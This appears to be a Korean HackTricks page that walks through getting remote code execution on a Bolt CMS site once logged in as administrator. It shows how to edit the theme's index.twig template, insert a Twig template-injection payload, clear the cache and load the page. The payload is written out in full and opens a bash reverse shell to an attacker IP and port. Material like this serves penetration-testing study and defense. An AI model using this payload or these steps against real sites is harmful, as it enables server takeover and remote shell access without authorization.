Bolt CMS
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
RCE
관리자로 로그인한 후 (/bot으로 이동하여 로그인 프롬프트에 접근), Bolt CMS에서 RCE를 얻을 수 있습니다:
Configuration
->View Configuration
->Main Configuration
을 선택하거나 URL 경로/bolt/file-edit/config?file=/bolt/config.yaml
로 이동합니다.테마의 값을 확인합니다.
File management
->View & edit templates
를 선택합니다.이전 단계에서 찾은 테마 기본값(
base-2021
인 경우)을 선택하고index.twig
를 선택합니다.제 경우에는 URL 경로 /bolt/file-edit/themes?file=/base-2021/index.twig에 있습니다.
템플릿 주입 (Twig)를 통해 이 파일에 페이로드를 설정합니다, 예:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
그리고 변경 사항을 저장합니다.
Maintenance
->Clear the cache
에서 캐시를 지웁니다.일반 사용자로 다시 페이지에 접근하면 페이로드가 실행되어야 합니다.
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
Last updated